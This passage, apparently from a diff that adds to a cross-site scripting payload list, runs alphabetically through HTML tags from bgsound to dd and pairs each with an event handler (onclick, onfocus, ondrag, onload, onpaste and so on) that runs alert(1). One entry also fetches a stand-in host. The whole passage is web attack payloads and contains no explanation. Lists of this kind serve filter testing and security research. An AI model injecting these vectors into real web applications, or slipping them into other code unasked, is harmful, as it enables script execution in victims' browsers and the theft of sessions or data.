onmouseover="alert(1)">test</bgsound> +<bgsound onmouseup="alert(1)">test</bgsound> +<bgsound onpaste="alert(1)" contenteditable>test</bgsound> +<big draggable="true" ondrag="alert(1)">test</big> +<big draggable="true" ondragend="alert(1)">test</big> +<big draggable="true" ondragenter="alert(1)">test</big> +<big draggable="true" ondragleave="alert(1)">test</big> +<big draggable="true" ondragstart="alert(1)">test</big> +<big id=x tabindex=1 onactivate=alert(1)></big> +<big id=x tabindex=1 onbeforeactivate=alert(1)></big> +<big id=x tabindex=1 onbeforedeactivate=alert(1)></big><input autofocus> +<big id=x tabindex=1 ondeactivate=alert(1)></big><input id=y autofocus> +<big id=x tabindex=1 onfocus=alert(1)></big> +<big id=x tabindex=1 onfocusin=alert(1)></big> +<big onbeforecopy="alert(1)" contenteditable>test</big> +<big onbeforecut="alert(1)" contenteditable>test</big> +<big onbeforepaste="alert(1)" contenteditable>test</big> +<big onblur=alert(1) tabindex=1 id=x></big><input autofocus> +<big onclick="alert(1)">test</big> +<big oncontextmenu="alert(1)">test</big> +<big oncopy="alert(1)" contenteditable>test</big> +<big oncut="alert(1)" contenteditable>test</big> +<big ondblclick="alert(1)">test</big> +<big onfocusout=alert(1) tabindex=1 id=x></big><input autofocus> +<big onkeydown="alert(1)" contenteditable>test</big> +<big onkeypress="alert(1)" contenteditable>test</big> +<big onkeyup="alert(1)" contenteditable>test</big> +<big onmousedown="alert(1)">test</big> +<big onmouseenter="alert(1)">test</big> +<big onmouseleave="alert(1)">test</big> +<big onmousemove="alert(1)">test</big> +<big onmouseout="alert(1)">test</big> +<big onmouseover="alert(1)">test</big> +<big onmouseup="alert(1)">test</big> +<big onpaste="alert(1)" contenteditable>test</big> +<blink draggable="true" ondrag="alert(1)">test</blink> +<blink draggable="true" ondragend="alert(1)">test</blink> +<blink draggable="true" ondragenter="alert(1)">test</blink> +<blink draggable="true" ondragleave="alert(1)">test</blink> +<blink draggable="true" ondragstart="alert(1)">test</blink> +<blink id=x tabindex=1 onactivate=alert(1)></blink> +<blink id=x tabindex=1 onbeforeactivate=alert(1)></blink> +<blink id=x tabindex=1 onbeforedeactivate=alert(1)></blink><input autofocus> +<blink id=x tabindex=1 ondeactivate=alert(1)></blink><input id=y autofocus> +<blink id=x tabindex=1 onfocus=alert(1)></blink> +<blink id=x tabindex=1 onfocusin=alert(1)></blink> +<blink onbeforecopy="alert(1)" contenteditable>test</blink> +<blink onbeforecut="alert(1)" contenteditable>test</blink> +<blink onbeforepaste="alert(1)" contenteditable>test</blink> +<blink onblur=alert(1) tabindex=1 id=x></blink><input autofocus> +<blink onclick="alert(1)">test</blink> +<blink oncontextmenu="alert(1)">test</blink> +<blink oncopy="alert(1)" contenteditable>test</blink> +<blink oncut="alert(1)" contenteditable>test</blink> +<blink ondblclick="alert(1)">test</blink> +<blink onfocusout=alert(1) tabindex=1 id=x></blink><input autofocus> +<blink onkeydown="alert(1)" contenteditable>test</blink> +<blink onkeypress="alert(1)" contenteditable>test</blink> +<blink onkeyup="alert(1)" contenteditable>test</blink> +<blink onmousedown="alert(1)">test</blink> +<blink onmouseenter="alert(1)">test</blink> +<blink onmouseleave="alert(1)">test</blink> +<blink onmousemove="alert(1)">test</blink> +<blink onmouseout="alert(1)">test</blink> +<blink onmouseover="alert(1)">test</blink> +<blink onmouseup="alert(1)">test</blink> +<blink onpaste="alert(1)" contenteditable>test</blink> +<blockquote draggable="true" ondrag="alert(1)">test</blockquote> +<blockquote draggable="true" ondragend="alert(1)">test</blockquote> +<blockquote draggable="true" ondragenter="alert(1)">test</blockquote> +<blockquote draggable="true" ondragleave="alert(1)">test</blockquote> +<blockquote draggable="true" ondragstart="alert(1)">test</blockquote> +<blockquote id=x tabindex=1 onactivate=alert(1)></blockquote> +<blockquote id=x tabindex=1 onbeforeactivate=alert(1)></blockquote> +<blockquote id=x tabindex=1 onbeforedeactivate=alert(1)></blockquote><input autofocus> +<blockquote id=x tabindex=1 ondeactivate=alert(1)></blockquote><input id=y autofocus> +<blockquote id=x tabindex=1 onfocus=alert(1)></blockquote> +<blockquote id=x tabindex=1 onfocusin=alert(1)></blockquote> +<blockquote onbeforecopy="alert(1)" contenteditable>test</blockquote> +<blockquote onbeforecut="alert(1)" contenteditable>test</blockquote> +<blockquote onbeforepaste="alert(1)" contenteditable>test</blockquote> +<blockquote onblur=alert(1) tabindex=1 id=x></blockquote><input autofocus> +<blockquote onclick="alert(1)">test</blockquote> +<blockquote oncontextmenu="alert(1)">test</blockquote> +<blockquote oncopy="alert(1)" contenteditable>test</blockquote> +<blockquote oncut="alert(1)" contenteditable>test</blockquote> +<blockquote ondblclick="alert(1)">test</blockquote> +<blockquote onfocusout=alert(1) tabindex=1 id=x></blockquote><input autofocus> +<blockquote onkeydown="alert(1)" contenteditable>test</blockquote> +<blockquote onkeypress="alert(1)" contenteditable>test</blockquote> +<blockquote onkeyup="alert(1)" contenteditable>test</blockquote> +<blockquote onmousedown="alert(1)">test</blockquote> +<blockquote onmouseenter="alert(1)">test</blockquote> +<blockquote onmouseleave="alert(1)">test</blockquote> +<blockquote onmousemove="alert(1)">test</blockquote> +<blockquote onmouseout="alert(1)">test</blockquote> +<blockquote onmouseover="alert(1)">test</blockquote> +<blockquote onmouseup="alert(1)">test</blockquote> +<blockquote onpaste="alert(1)" contenteditable>test</blockquote> +<body draggable="true" ondrag="alert(1)">test</body> +<body draggable="true" ondragend="alert(1)">test</body> +<body draggable="true" ondragenter="alert(1)">test</body> +<body draggable="true" ondragleave="alert(1)">test</body> +<body draggable="true" ondragstart="alert(1)">test</body> +<body id=x tabindex=1 onactivate=alert(1)></body> +<body id=x tabindex=1 onbeforeactivate=alert(1)></body> +<body id=x tabindex=1 onbeforedeactivate=alert(1)></body><input autofocus> +<body id=x tabindex=1 ondeactivate=alert(1)></body><input id=y autofocus> +<body id=x tabindex=1 onfocus=alert(1)></body> +<body id=x tabindex=1 onfocusin=alert(1)></body> +<body onafterprint=alert(1)> +<body onbeforecopy="alert(1)" contenteditable>test</body> +<body onbeforecut="alert(1)" contenteditable>test</body> +<body onbeforepaste="alert(1)" contenteditable>test</body> +<body onbeforeprint=alert(1)> +<body onbeforeunload="location='javascript:alert(1)'"> +<body onblur=alert(1) id=x><iframe id=x> +<body onclick="alert(1)">test</body> +<body oncontextmenu="alert(1)">test</body> +<body oncopy="alert(1)" contenteditable>test</body> +<body oncut="alert(1)" contenteditable>test</body> +<body ondblclick="alert(1)">test</body> +<body onerror=alert(1) onload=/> +<body onfocusout=alert(1) id=x><iframe id=x> +<body onhashchange="alert(1)"> +<body onkeydown="alert(1)" contenteditable>test</body> +<body onkeypress="alert(1)" contenteditable>test</body> +<body onkeyup="alert(1)" contenteditable>test</body> +<body onload=alert(1)> +<body onmessage=alert(1)> +<body onmousedown="alert(1)">test</body> +<body onmouseenter="alert(1)">test</body> +<body onmouseleave="alert(1)">test</body> +<body onmousemove="alert(1)">test</body> +<body onmouseout="alert(1)">test</body> +<body onmouseover="alert(1)">test</body> +<body onmouseup="alert(1)">test</body> +<body onpageshow=alert(1)> +<body onpaste="alert(1)" contenteditable>test</body> +<body onpopstate=alert(1)> +<body onresize="alert(1)"> +<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div> +<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script> +<body onwheel=alert(1)> +<br draggable="true" ondrag="alert(1)">test</br> +<br draggable="true" ondragend="alert(1)">test</br> +<br draggable="true" ondragenter="alert(1)">test</br> +<br draggable="true" ondragleave="alert(1)">test</br> +<br draggable="true" ondragstart="alert(1)">test</br> +<br id=x tabindex=1 onactivate=alert(1)></br> +<br id=x tabindex=1 onbeforeactivate=alert(1)></br> +<br id=x tabindex=1 onbeforedeactivate=alert(1)></br><input autofocus> +<br id=x tabindex=1 ondeactivate=alert(1)></br><input id=y autofocus> +<br id=x tabindex=1 onfocus=alert(1)></br> +<br id=x tabindex=1 onfocusin=alert(1)></br> +<br onbeforecopy="alert(1)" contenteditable>test</br> +<br onbeforecut="alert(1)" contenteditable>test</br> +<br onbeforepaste="alert(1)" contenteditable>test</br> +<br onblur=alert(1) tabindex=1 id=x></br><input autofocus> +<br onclick="alert(1)">test</br> +<br oncontextmenu="alert(1)">test</br> +<br oncopy="alert(1)" contenteditable>test</br> +<br oncut="alert(1)" contenteditable>test</br> +<br ondblclick="alert(1)">test</br> +<br onfocusout=alert(1) tabindex=1 id=x></br><input autofocus> +<br onkeydown="alert(1)" contenteditable>test</br> +<br onkeypress="alert(1)" contenteditable>test</br> +<br onkeyup="alert(1)" contenteditable>test</br> +<br onmousedown="alert(1)">test</br> +<br onmouseenter="alert(1)">test</br> +<br onmouseleave="alert(1)">test</br> +<br onmousemove="alert(1)">test</br> +<br onmouseout="alert(1)">test</br> +<br onmouseover="alert(1)">test</br> +<br onmouseup="alert(1)">test</br> +<br onpaste="alert(1)" contenteditable>test</br> +<button autofocus onfocus=alert(1)>test</button> +<button autofocus onfocusin=alert(1)>test</button> +<button draggable="true" ondrag="alert(1)">test</button> +<button draggable="true" ondragend="alert(1)">test</button> +<button draggable="true" ondragenter="alert(1)">test</button> +<button draggable="true" ondragleave="alert(1)">test</button> +<button draggable="true" ondragstart="alert(1)">test</button> +<button id=x tabindex=1 onactivate=alert(1)></button> +<button id=x tabindex=1 onbeforeactivate=alert(1)></button> +<button id=x tabindex=1 onbeforedeactivate=alert(1)></button><input autofocus> +<button id=x tabindex=1 ondeactivate=alert(1)></button><input id=y autofocus> +<button onbeforecopy="alert(1)" contenteditable>test</button> +<button onbeforecut="alert(1)" contenteditable>test</button> +<button onbeforepaste="alert(1)" contenteditable>test</button> +<button onblur=alert(1) id=x></button><input autofocus> +<button onclick="alert(1)">test</button> +<button oncontextmenu="alert(1)">test</button> +<button oncopy="alert(1)" contenteditable>test</button> +<button oncut="alert(1)" contenteditable>test</button> +<button ondblclick="alert(1)">test</button> +<button onfocusout=alert(1) id=x></button><input autofocus> +<button onkeydown="alert(1)" contenteditable>test</button> +<button onkeypress="alert(1)" contenteditable>test</button> +<button onkeyup="alert(1)" contenteditable>test</button> +<button onmousedown="alert(1)">test</button> +<button onmouseenter="alert(1)">test</button> +<button onmouseleave="alert(1)">test</button> +<button onmousemove="alert(1)">test</button> +<button onmouseout="alert(1)">test</button> +<button onmouseover="alert(1)">test</button> +<button onmouseup="alert(1)">test</button> +<button onpaste="alert(1)" contenteditable>test</button> +<canvas draggable="true" ondrag="alert(1)">test</canvas> +<canvas draggable="true" ondragend="alert(1)">test</canvas> +<canvas draggable="true" ondragenter="alert(1)">test</canvas> +<canvas draggable="true" ondragleave="alert(1)">test</canvas> +<canvas draggable="true" ondragstart="alert(1)">test</canvas> +<canvas id=x tabindex=1 onactivate=alert(1)></canvas> +<canvas id=x tabindex=1 onbeforeactivate=alert(1)></canvas> +<canvas id=x tabindex=1 onbeforedeactivate=alert(1)></canvas><input autofocus> +<canvas id=x tabindex=1 ondeactivate=alert(1)></canvas><input id=y autofocus> +<canvas id=x tabindex=1 onfocus=alert(1)></canvas> +<canvas id=x tabindex=1 onfocusin=alert(1)></canvas> +<canvas onbeforecopy="alert(1)" contenteditable>test</canvas> +<canvas onbeforecut="alert(1)" contenteditable>test</canvas> +<canvas onbeforepaste="alert(1)" contenteditable>test</canvas> +<canvas onblur=alert(1) tabindex=1 id=x></canvas><input autofocus> +<canvas onclick="alert(1)">test</canvas> +<canvas oncontextmenu="alert(1)">test</canvas> +<canvas oncopy="alert(1)" contenteditable>test</canvas> +<canvas oncut="alert(1)" contenteditable>test</canvas> +<canvas ondblclick="alert(1)">test</canvas> +<canvas onfocusout=alert(1) tabindex=1 id=x></canvas><input autofocus> +<canvas onkeydown="alert(1)" contenteditable>test</canvas> +<canvas onkeypress="alert(1)" contenteditable>test</canvas> +<canvas onkeyup="alert(1)" contenteditable>test</canvas> +<canvas onmousedown="alert(1)">test</canvas> +<canvas onmouseenter="alert(1)">test</canvas> +<canvas onmouseleave="alert(1)">test</canvas> +<canvas onmousemove="alert(1)">test</canvas> +<canvas onmouseout="alert(1)">test</canvas> +<canvas onmouseover="alert(1)">test</canvas> +<canvas onmouseup="alert(1)">test</canvas> +<canvas onpaste="alert(1)" contenteditable>test</canvas> +<caption draggable="true" ondrag="alert(1)">test</caption> +<caption draggable="true" ondragend="alert(1)">test</caption> +<caption draggable="true" ondragenter="alert(1)">test</caption> +<caption draggable="true" ondragleave="alert(1)">test</caption> +<caption draggable="true" ondragstart="alert(1)">test</caption> +<caption id=x tabindex=1 onactivate=alert(1)></caption> +<caption id=x tabindex=1 onbeforeactivate=alert(1)></caption> +<caption id=x tabindex=1 onbeforedeactivate=alert(1)></caption><input autofocus> +<caption id=x tabindex=1 ondeactivate=alert(1)></caption><input id=y autofocus> +<caption id=x tabindex=1 onfocus=alert(1)></caption> +<caption id=x tabindex=1 onfocusin=alert(1)></caption> +<caption onbeforecopy="alert(1)" contenteditable>test</caption> +<caption onbeforecut="alert(1)" contenteditable>test</caption> +<caption onbeforepaste="alert(1)" contenteditable>test</caption> +<caption onblur=alert(1) tabindex=1 id=x></caption><input autofocus> +<caption onclick="alert(1)">test</caption> +<caption oncontextmenu="alert(1)">test</caption> +<caption oncopy="alert(1)" contenteditable>test</caption> +<caption oncut="alert(1)" contenteditable>test</caption> +<caption ondblclick="alert(1)">test</caption> +<caption onfocusout=alert(1) tabindex=1 id=x></caption><input autofocus> +<caption onkeydown="alert(1)" contenteditable>test</caption> +<caption onkeypress="alert(1)" contenteditable>test</caption> +<caption onkeyup="alert(1)" contenteditable>test</caption> +<caption onmousedown="alert(1)">test</caption> +<caption onmouseenter="alert(1)">test</caption> +<caption onmouseleave="alert(1)">test</caption> +<caption onmousemove="alert(1)">test</caption> +<caption onmouseout="alert(1)">test</caption> +<caption onmouseover="alert(1)">test</caption> +<caption onmouseup="alert(1)">test</caption> +<caption onpaste="alert(1)" contenteditable>test</caption> +<center draggable="true" ondrag="alert(1)">test</center> +<center draggable="true" ondragend="alert(1)">test</center> +<center draggable="true" ondragenter="alert(1)">test</center> +<center draggable="true" ondragleave="alert(1)">test</center> +<center draggable="true" ondragstart="alert(1)">test</center> +<center id=x tabindex=1 onactivate=alert(1)></center> +<center id=x tabindex=1 onbeforeactivate=alert(1)></center> +<center id=x tabindex=1 onbeforedeactivate=alert(1)></center><input autofocus> +<center id=x tabindex=1 ondeactivate=alert(1)></center><input id=y autofocus> +<center id=x tabindex=1 onfocus=alert(1)></center> +<center id=x tabindex=1 onfocusin=alert(1)></center> +<center onbeforecopy="alert(1)" contenteditable>test</center> +<center onbeforecut="alert(1)" contenteditable>test</center> +<center onbeforepaste="alert(1)" contenteditable>test</center> +<center onblur=alert(1) tabindex=1 id=x></center><input autofocus> +<center onclick="alert(1)">test</center> +<center oncontextmenu="alert(1)">test</center> +<center oncopy="alert(1)" contenteditable>test</center> +<center oncut="alert(1)" contenteditable>test</center> +<center ondblclick="alert(1)">test</center> +<center onfocusout=alert(1) tabindex=1 id=x></center><input autofocus> +<center onkeydown="alert(1)" contenteditable>test</center> +<center onkeypress="alert(1)" contenteditable>test</center> +<center onkeyup="alert(1)" contenteditable>test</center> +<center onmousedown="alert(1)">test</center> +<center onmouseenter="alert(1)">test</center> +<center onmouseleave="alert(1)">test</center> +<center onmousemove="alert(1)">test</center> +<center onmouseout="alert(1)">test</center> +<center onmouseover="alert(1)">test</center> +<center onmouseup="alert(1)">test</center> +<center onpaste="alert(1)" contenteditable>test</center> +<cite draggable="true" ondrag="alert(1)">test</cite> +<cite draggable="true" ondragend="alert(1)">test</cite> +<cite draggable="true" ondragenter="alert(1)">test</cite> +<cite draggable="true" ondragleave="alert(1)">test</cite> +<cite draggable="true" ondragstart="alert(1)">test</cite> +<cite id=x tabindex=1 onactivate=alert(1)></cite> +<cite id=x tabindex=1 onbeforeactivate=alert(1)></cite> +<cite id=x tabindex=1 onbeforedeactivate=alert(1)></cite><input autofocus> +<cite id=x tabindex=1 ondeactivate=alert(1)></cite><input id=y autofocus> +<cite id=x tabindex=1 onfocus=alert(1)></cite> +<cite id=x tabindex=1 onfocusin=alert(1)></cite> +<cite onbeforecopy="alert(1)" contenteditable>test</cite> +<cite onbeforecut="alert(1)" contenteditable>test</cite> +<cite onbeforepaste="alert(1)" contenteditable>test</cite> +<cite onblur=alert(1) tabindex=1 id=x></cite><input autofocus> +<cite onclick="alert(1)">test</cite> +<cite oncontextmenu="alert(1)">test</cite> +<cite oncopy="alert(1)" contenteditable>test</cite> +<cite oncut="alert(1)" contenteditable>test</cite> +<cite ondblclick="alert(1)">test</cite> +<cite onfocusout=alert(1) tabindex=1 id=x></cite><input autofocus> +<cite onkeydown="alert(1)" contenteditable>test</cite> +<cite onkeypress="alert(1)" contenteditable>test</cite> +<cite onkeyup="alert(1)" contenteditable>test</cite> +<cite onmousedown="alert(1)">test</cite> +<cite onmouseenter="alert(1)">test</cite> +<cite onmouseleave="alert(1)">test</cite> +<cite onmousemove="alert(1)">test</cite> +<cite onmouseout="alert(1)">test</cite> +<cite onmouseover="alert(1)">test</cite> +<cite onmouseup="alert(1)">test</cite> +<cite onpaste="alert(1)" contenteditable>test</cite> +<code draggable="true" ondrag="alert(1)">test</code> +<code draggable="true" ondragend="alert(1)">test</code> +<code draggable="true" ondragenter="alert(1)">test</code> +<code draggable="true" ondragleave="alert(1)">test</code> +<code draggable="true" ondragstart="alert(1)">test</code> +<code id=x tabindex=1 onactivate=alert(1)></code> +<code id=x tabindex=1 onbeforeactivate=alert(1)></code> +<code id=x tabindex=1 onbeforedeactivate=alert(1)></code><input autofocus> +<code id=x tabindex=1 ondeactivate=alert(1)></code><input id=y autofocus> +<code id=x tabindex=1 onfocus=alert(1)></code> +<code id=x tabindex=1 onfocusin=alert(1)></code> +<code onbeforecopy="alert(1)" contenteditable>test</code> +<code onbeforecut="alert(1)" contenteditable>test</code> +<code onbeforepaste="alert(1)" contenteditable>test</code> +<code onblur=alert(1) tabindex=1 id=x></code><input autofocus> +<code onclick="alert(1)">test</code> +<code oncontextmenu="alert(1)">test</code> +<code oncopy="alert(1)" contenteditable>test</code> +<code oncut="alert(1)" contenteditable>test</code> +<code ondblclick="alert(1)">test</code> +<code onfocusout=alert(1) tabindex=1 id=x></code><input autofocus> +<code onkeydown="alert(1)" contenteditable>test</code> +<code onkeypress="alert(1)" contenteditable>test</code> +<code onkeyup="alert(1)" contenteditable>test</code> +<code onmousedown="alert(1)">test</code> +<code onmouseenter="alert(1)">test</code> +<code onmouseleave="alert(1)">test</code> +<code onmousemove="alert(1)">test</code> +<code onmouseout="alert(1)">test</code> +<code onmouseover="alert(1)">test</code> +<code onmouseup="alert(1)">test</code> +<code onpaste="alert(1)" contenteditable>test</code> +<col draggable="true" ondrag="alert(1)">test</col> +<col draggable="true" ondragend="alert(1)">test</col> +<col draggable="true" ondragenter="alert(1)">test</col> +<col draggable="true" ondragleave="alert(1)">test</col> +<col draggable="true" ondragstart="alert(1)">test</col> +<col id=x tabindex=1 onactivate=alert(1)></col> +<col id=x tabindex=1 onbeforeactivate=alert(1)></col> +<col id=x tabindex=1 onbeforedeactivate=alert(1)></col><input autofocus> +<col id=x tabindex=1 ondeactivate=alert(1)></col><input id=y autofocus> +<col id=x tabindex=1 onfocus=alert(1)></col> +<col id=x tabindex=1 onfocusin=alert(1)></col> +<col onbeforecopy="alert(1)" contenteditable>test</col> +<col onbeforecut="alert(1)" contenteditable>test</col> +<col onbeforepaste="alert(1)" contenteditable>test</col> +<col onblur=alert(1) tabindex=1 id=x></col><input autofocus> +<col onclick="alert(1)">test</col> +<col oncontextmenu="alert(1)">test</col> +<col oncopy="alert(1)" contenteditable>test</col> +<col oncut="alert(1)" contenteditable>test</col> +<col ondblclick="alert(1)">test</col> +<col onfocusout=alert(1) tabindex=1 id=x></col><input autofocus> +<col onkeydown="alert(1)" contenteditable>test</col> +<col onkeypress="alert(1)" contenteditable>test</col> +<col onkeyup="alert(1)" contenteditable>test</col> +<col onmousedown="alert(1)">test</col> +<col onmouseenter="alert(1)">test</col> +<col onmouseleave="alert(1)">test</col> +<col onmousemove="alert(1)">test</col> +<col onmouseout="alert(1)">test</col> +<col onmouseover="alert(1)">test</col> +<col onmouseup="alert(1)">test</col> +<col onpaste="alert(1)" contenteditable>test</col> +<colgroup draggable="true" ondrag="alert(1)">test</colgroup> +<colgroup draggable="true" ondragend="alert(1)">test</colgroup> +<colgroup draggable="true" ondragenter="alert(1)">test</colgroup> +<colgroup draggable="true" ondragleave="alert(1)">test</colgroup> +<colgroup draggable="true" ondragstart="alert(1)">test</colgroup> +<colgroup id=x tabindex=1 onactivate=alert(1)></colgroup> +<colgroup id=x tabindex=1 onbeforeactivate=alert(1)></colgroup> +<colgroup id=x tabindex=1 onbeforedeactivate=alert(1)></colgroup><input autofocus> +<colgroup id=x tabindex=1 ondeactivate=alert(1)></colgroup><input id=y autofocus> +<colgroup id=x tabindex=1 onfocus=alert(1)></colgroup> +<colgroup id=x tabindex=1 onfocusin=alert(1)></colgroup> +<colgroup onbeforecopy="alert(1)" contenteditable>test</colgroup> +<colgroup onbeforecut="alert(1)" contenteditable>test</colgroup> +<colgroup onbeforepaste="alert(1)" contenteditable>test</colgroup> +<colgroup onblur=alert(1) tabindex=1 id=x></colgroup><input autofocus> +<colgroup onclick="alert(1)">test</colgroup> +<colgroup oncontextmenu="alert(1)">test</colgroup> +<colgroup oncopy="alert(1)" contenteditable>test</colgroup> +<colgroup oncut="alert(1)" contenteditable>test</colgroup> +<colgroup ondblclick="alert(1)">test</colgroup> +<colgroup onfocusout=alert(1) tabindex=1 id=x></colgroup><input autofocus> +<colgroup onkeydown="alert(1)" contenteditable>test</colgroup> +<colgroup onkeypress="alert(1)" contenteditable>test</colgroup> +<colgroup onkeyup="alert(1)" contenteditable>test</colgroup> +<colgroup onmousedown="alert(1)">test</colgroup> +<colgroup onmouseenter="alert(1)">test</colgroup> +<colgroup onmouseleave="alert(1)">test</colgroup> +<colgroup onmousemove="alert(1)">test</colgroup> +<colgroup onmouseout="alert(1)">test</colgroup> +<colgroup onmouseover="alert(1)">test</colgroup> +<colgroup onmouseup="alert(1)">test</colgroup> +<colgroup onpaste="alert(1)" contenteditable>test</colgroup> +<command draggable="true" ondrag="alert(1)">test</command> +<command draggable="true" ondragend="alert(1)">test</command> +<command draggable="true" ondragenter="alert(1)">test</command> +<command draggable="true" ondragleave="alert(1)">test</command> +<command draggable="true" ondragstart="alert(1)">test</command> +<command id=x tabindex=1 onactivate=alert(1)></command> +<command id=x tabindex=1 onbeforeactivate=alert(1)></command> +<command id=x tabindex=1 onbeforedeactivate=alert(1)></command><input autofocus> +<command id=x tabindex=1 ondeactivate=alert(1)></command><input id=y autofocus> +<command id=x tabindex=1 onfocus=alert(1)></command> +<command id=x tabindex=1 onfocusin=alert(1)></command> +<command onbeforecopy="alert(1)" contenteditable>test</command> +<command onbeforecut="alert(1)" contenteditable>test</command> +<command onbeforepaste="alert(1)" contenteditable>test</command> +<command onblur=alert(1) tabindex=1 id=x></command><input autofocus> +<command onclick="alert(1)">test</command> +<command oncontextmenu="alert(1)">test</command> +<command oncopy="alert(1)" contenteditable>test</command> +<command oncut="alert(1)" contenteditable>test</command> +<command ondblclick="alert(1)">test</command> +<command onfocusout=alert(1) tabindex=1 id=x></command><input autofocus> +<command onkeydown="alert(1)" contenteditable>test</command> +<command onkeypress="alert(1)" contenteditable>test</command> +<command onkeyup="alert(1)" contenteditable>test</command> +<command onmousedown="alert(1)">test</command> +<command onmouseenter="alert(1)">test</command> +<command onmouseleave="alert(1)">test</command> +<command onmousemove="alert(1)">test</command> +<command onmouseout="alert(1)">test</command> +<command onmouseover="alert(1)">test</command> +<command onmouseup="alert(1)">test</command> +<command onpaste="alert(1)" contenteditable>test</command> +<content draggable="true" ondrag="alert(1)">test</content> +<content draggable="true" ondragend="alert(1)">test</content> +<content draggable="true" ondragenter="alert(1)">test</content> +<content draggable="true" ondragleave="alert(1)">test</content> +<content draggable="true" ondragstart="alert(1)">test</content> +<content id=x tabindex=1 onactivate=alert(1)></content> +<content id=x tabindex=1 onbeforeactivate=alert(1)></content> +<content id=x tabindex=1 onbeforedeactivate=alert(1)></content><input autofocus> +<content id=x tabindex=1 ondeactivate=alert(1)></content><input id=y autofocus> +<content id=x tabindex=1 onfocus=alert(1)></content> +<content id=x tabindex=1 onfocusin=alert(1)></content> +<content onbeforecopy="alert(1)" contenteditable>test</content> +<content onbeforecut="alert(1)" contenteditable>test</content> +<content onbeforepaste="alert(1)" contenteditable>test</content> +<content onblur=alert(1) tabindex=1 id=x></content><input autofocus> +<content onclick="alert(1)">test</content> +<content oncontextmenu="alert(1)">test</content> +<content oncopy="alert(1)" contenteditable>test</content> +<content oncut="alert(1)" contenteditable>test</content> +<content ondblclick="alert(1)">test</content> +<content onfocusout=alert(1) tabindex=1 id=x></content><input autofocus> +<content onkeydown="alert(1)" contenteditable>test</content> +<content onkeypress="alert(1)" contenteditable>test</content> +<content onkeyup="alert(1)" contenteditable>test</content> +<content onmousedown="alert(1)">test</content> +<content onmouseenter="alert(1)">test</content> +<content onmouseleave="alert(1)">test</content> +<content onmousemove="alert(1)">test</content> +<content onmouseout="alert(1)">test</content> +<content onmouseover="alert(1)">test</content> +<content onmouseup="alert(1)">test</content> +<content onpaste="alert(1)" contenteditable>test</content> +<data draggable="true" ondrag="alert(1)">test</data> +<data draggable="true" ondragend="alert(1)">test</data> +<data draggable="true" ondragenter="alert(1)">test</data> +<data draggable="true" ondragleave="alert(1)">test</data> +<data draggable="true" ondragstart="alert(1)">test</data> +<data id=x tabindex=1 onactivate=alert(1)></data> +<data id=x tabindex=1 onbeforeactivate=alert(1)></data> +<data id=x tabindex=1 onbeforedeactivate=alert(1)></data><input autofocus> +<data id=x tabindex=1 ondeactivate=alert(1)></data><input id=y autofocus> +<data id=x tabindex=1 onfocus=alert(1)></data> +<data id=x tabindex=1 onfocusin=alert(1)></data> +<data onbeforecopy="alert(1)" contenteditable>test</data> +<data onbeforecut="alert(1)" contenteditable>test</data> +<data onbeforepaste="alert(1)" contenteditable>test</data> +<data onblur=alert(1) tabindex=1 id=x></data><input autofocus> +<data onclick="alert(1)">test</data> +<data oncontextmenu="alert(1)">test</data> +<data oncopy="alert(1)" contenteditable>test</data> +<data oncut="alert(1)" contenteditable>test</data> +<data ondblclick="alert(1)">test</data> +<data onfocusout=alert(1) tabindex=1 id=x></data><input autofocus> +<data onkeydown="alert(1)" contenteditable>test</data> +<data onkeypress="alert(1)" contenteditable>test</data> +<data onkeyup="alert(1)" contenteditable>test</data> +<data onmousedown="alert(1)">test</data> +<data onmouseenter="alert(1)">test</data> +<data onmouseleave="alert(1)">test</data> +<data onmousemove="alert(1)">test</data> +<data onmouseout="alert(1)">test</data> +<data onmouseover="alert(1)">test</data> +<data onmouseup="alert(1)">test</data> +<data onpaste="alert(1)" contenteditable>test</data> +<datalist draggable="true" ondrag="alert(1)">test</datalist> +<datalist draggable="true" ondragend="alert(1)">test</datalist> +<datalist draggable="true" ondragenter="alert(1)">test</datalist> +<datalist draggable="true" ondragleave="alert(1)">test</datalist> +<datalist draggable="true" ondragstart="alert(1)">test</datalist> +<datalist id=x tabindex=1 onactivate=alert(1)></datalist> +<datalist id=x tabindex=1 onbeforeactivate=alert(1)></datalist> +<datalist id=x tabindex=1 onbeforedeactivate=alert(1)></datalist><input autofocus> +<datalist id=x tabindex=1 ondeactivate=alert(1)></datalist><input id=y autofocus> +<datalist id=x tabindex=1 onfocus=alert(1)></datalist> +<datalist id=x tabindex=1 onfocusin=alert(1)></datalist> +<datalist onbeforecopy="alert(1)" contenteditable>test</datalist> +<datalist onbeforecut="alert(1)" contenteditable>test</datalist> +<datalist onbeforepaste="alert(1)" contenteditable>test</datalist> +<datalist onblur=alert(1) tabindex=1 id=x></datalist><input autofocus> +<datalist onclick="alert(1)">test</datalist> +<datalist oncontextmenu="alert(1)">test</datalist> +<datalist oncopy="alert(1)" contenteditable>test</datalist> +<datalist oncut="alert(1)" contenteditable>test</datalist> +<datalist ondblclick="alert(1)">test</datalist> +<datalist onfocusout=alert(1) tabindex=1 id=x></datalist><input autofocus> +<datalist onkeydown="alert(1)" contenteditable>test</datalist> +<datalist onkeypress="alert(1)" contenteditable>test</datalist> +<datalist onkeyup="alert(1)" contenteditable>test</datalist> +<datalist onmousedown="alert(1)">test</datalist> +<datalist onmouseenter="alert(1)">test</datalist> +<datalist onmouseleave="alert(1)">test</datalist> +<datalist onmousemove="alert(1)">test</datalist> +<datalist onmouseout="alert(1)">test</datalist> +<datalist onmouseover="alert(1)">test</datalist> +<datalist onmouseup="alert(1)">test</datalist> +<datalist onpaste="alert(1)" contenteditable>test</datalist> +<dd draggable="true" ondrag="alert(1)">test</dd> +<dd draggable="true" ondragend="alert(1)">test</dd> +<dd draggable="true" ondragenter="alert(1)">test</dd> +<dd draggable="true" ondragleave="alert(1)">test</dd> +<dd draggable="true" ondragstart="alert(1)">test</dd> +<dd id=x tabindex=1 onactivate=alert(1)></dd> +<dd id=x tabindex=1 onbeforeactivate=alert(1)></dd> +<dd id=x tabindex=1 onbeforedeactivate=alert(1)></dd><input autofocus> +<dd id=x tabindex=1 ondeactivate=alert(1)></dd><input id=y autofocus> +<dd id=x tabindex=1 onfocus=alert(1)></dd> +<dd id=x tabindex=1 onfocusin=alert(1)></dd> +<dd onbeforecopy="alert(1)" contenteditable>test</dd> +<dd onbeforecut="alert(1)" contenteditable>test</dd> +<dd onbeforepaste="alert(1)" contenteditable>test</dd> +<dd onblur=alert(1) tabindex=1 id=x></dd><input autofocus> +<dd onclick="alert(1)">test</dd> +<dd oncontextmenu="alert(1)">test</dd> +<dd 